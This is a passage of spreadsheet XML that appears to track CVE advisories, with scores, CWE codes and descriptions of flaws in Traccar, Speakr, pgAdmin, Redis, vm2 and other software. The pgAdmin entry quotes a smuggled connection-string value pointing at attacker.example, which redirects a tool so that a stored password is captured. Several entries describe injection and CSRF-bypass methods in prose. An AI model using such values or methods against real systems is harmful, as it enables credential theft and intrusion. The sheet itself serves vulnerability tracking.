          <t>The Dictionary WordPress plugin through 1.0 does not escape user input before reflecting it back in the responses of several directly accessible scripts, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against anyone they can induce to submit a crafted request.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15697</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44236</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized connection.tune.frame_max value during amqp_login(), and rabbitmq-c accepts the value in amqp_login_inner() in librabbitmq/amqp_socket.c. amqp_tune_connection() in librabbitmq/amqp_connection.c uses frame_max to reallocate the outbound buffer without enforcing AMQP_FRAME_MIN_SIZE. Immediate serialization of connection.tune-ok through amqp_frame_to_bytes() writes beyond the undersized heap allocation, causing memory corruption and likely denial of service. An on-path attacker can also trigger the flaw against plaintext AMQP traffic. Code execution is theoretically possible but was not demonstrated. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44236</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52851</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Traccar is an open source GPS tracking system. Prior to 6.14.0, an authenticated, non-readonly user with access to an object usable in a permission pair can submit DELETE /api/permissions with an extra attacker-controlled JSON key. Permission(LinkedHashMap&lt;String, Long&gt;) in src/main/java/org/traccar/model/Permission.java validates only the first two keys, but DatabaseStorage.removePermission() in src/main/java/org/traccar/storage/DatabaseStorage.java concatenates every map key into the SQL WHERE clause as a column identifier. The extra key therefore becomes attacker-controlled SQL and provides a blind boolean or error oracle that can extract arbitrary database values, including administrator email, password hashes, and salts, or conditionally delete permission rows. Unauthenticated requests are rejected. This issue is fixed in 6.14.0.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52851</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54510</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-352</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Speakr is a personal, self-hosted web application designed for transcribing audio recordings. Prior to 0.8.21-alpha, the csrf_exempt_for_api_tokens() before_request hook in src/app.py calls csrf.exempt(view_func), permanently adding the selected view to Flask-WTF's process-global exemption set. The is_token_authenticated() function in src/utils/token_auth.py calls extract_token_from_request() and treats any present token, including request.args.get('token'), as authenticated without hashing the token, querying the database, or checking validity. A network-reachable attacker can therefore send a false token to disable CSRF protection for the targeted view for the worker lifetime. Because the exemption applies to the view function across HTTP methods, a cross-origin GET to /account with a query token can poison CSRF state for a later state-changing POST without triggering CORS preflight. This browser sequence requires attacker-controlled content on a sibling subdomain under the documented cookie conditions. The bypass can modify profile data, custom prompts, transcription settings, preferences, and administrative status through routes such as admin_toggle_admin. The change_password route also skips current-password verification when current_user.password is empty, allowing the chain to set a local password on an SSO-only account and bypass SSO. This issue is fixed in version 0.8.21-alpha.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54510</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54524</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Frappe HR is an open-source human resources management solution (HRMS). Prior to 16.7.0, an authenticated user with the HR User role can inject SQL through filters in the Salary Payments Based on Payment Mode report. In hrms/payroll/report/salary_payments_based_on_payment_mode/salary_payments_based_on_payment_mode.py, get_conditions constructs filter clauses from user-controlled values and get_data incorporates those clauses into a string-formatted SQL query, allowing extraction of arbitrary database data. This issue is fixed in 16.7.0.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54524</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54608</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-862</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>MythicalDash is a Pterodactyl client area. In 3.5.4-aurora and earlier, GET /api/stripe/process in backend/app/Api/System/Gateways/Stripe.php creates a pending row in mythicaldash_stripe_payments before Stripe checkout succeeds and embeds the payment code in the success redirect, while GET /api/stripe/processed accepts that code without constructing a Session, checking ownership, or retrieving the Stripe Checkout Session to require payment_status to be paid and amount_total to match the expected charge. An ordinary authenticated user can request an attacker-selected coins amount, abandon or fail payment, and submit the pending code directly to the unauthenticated processed endpoint. StripeDB::isPending() then permits User::addCreditsAtomic() to grant the unpaid amount and mark the row processed even though Stripe has not confirmed payment. This permits arbitrary free virtual-currency top-ups and direct financial loss through consumption of hosting resources. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54608</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66571</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Asset CleanUp: Page Speed Booster &lt;= 1.4.0.5 versions.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66571</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86049</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>pip:jupyter_server</t>
        </is>
      </c>
      <c r="M231" s="5" t="inlineStr">
        <is>
          <t>2.21.0</t>
        </is>
      </c>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Jupyter Server is the backend for Jupyter web applications. Prior to version 2.21.0, the 5xx request logging path in jupyter_server/log.py copies the Referer header into a JSON header block without applying the token scrubbing used for the request URI. A request that returns HTTP 500 while the Referer contains a token-bearing URL can therefore write that token to server logs in plaintext. An attacker who can read those logs can recover the token and use the affected user's Jupyter Server permissions. This issue is fixed in version 2.21.0.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86049</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86862</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-522, CWE-88, CWE-918</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.
The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.
The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. Where pg_restore requires a --dbname argument to be present, an empty value is passed, which contains no equals sign and is therefore not expanded, while the real name is taken from the environment.
This issue affects pgAdmin 4: from the introduction of the --dbname argument in the Restore and Maintenance tools before 9.18.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86862</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90887</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WP Inventory Manager &lt;= 2.5.4 versions.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90887</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90986</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Visitor Traffic Real Time Statistics Pro &lt;= 11.21 versions.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90986</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91014</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>The Realtyna Organic IDX plugin + WPL Real Estate WordPress plugin before 5.4.2 does not sanitise and escape some of its parameters before reflecting them back in the page, allowing unauthenticated attackers to run arbitrary web scripts in a visitor's browser if they can trick the visitor into following a crafted link (reflected XSS).</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91014</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92925</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Redis community. The cluster bus packet parser, responsible for handling PING, PONG, and MEET packets, fails to properly validate string-carrying extensions for null-termination. This oversight allows a remote attacker to craft a malicious packet, leading to an out-of-bounds read when the packet's payload is processed. Successful exploitation of this vulnerability could result in the disclosure of sensitive information or a remote denial of service (DoS).</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92925</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92959</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 does not fully enforce the allowAsync: false option in VM and NodeVM. While localPromise.prototype.then is replaced with a handler that throws 'Async not available', the sandbox's Promise static methods (Promise.resolve, Promise.all, Promise.race, Promise.any, and Promise.allSettled) still assimilate attacker-supplied thenables: native promise resolution performs PromiseResolveThenableJob and invokes the sandboxed code's then method in a microtask without passing through the patched then, so the async restriction is never applied. As a result, sandboxed script can schedule work that runs after VM.run() or NodeVM.run() has returned and outside the configured timeout, continuing to execute after the host believes execution is complete.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92959</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93014</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>RosarioSIS versions before 12.9 fail to validate the filename request parameter in Users and Students modules, allowing authenticated users to unlink allow-listed files via path traversal. Attackers can use parent-directory sequences to escape upload directories and delete CSS, XML, JSON resources and other users' documents throughout the installation.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93014</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45720</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
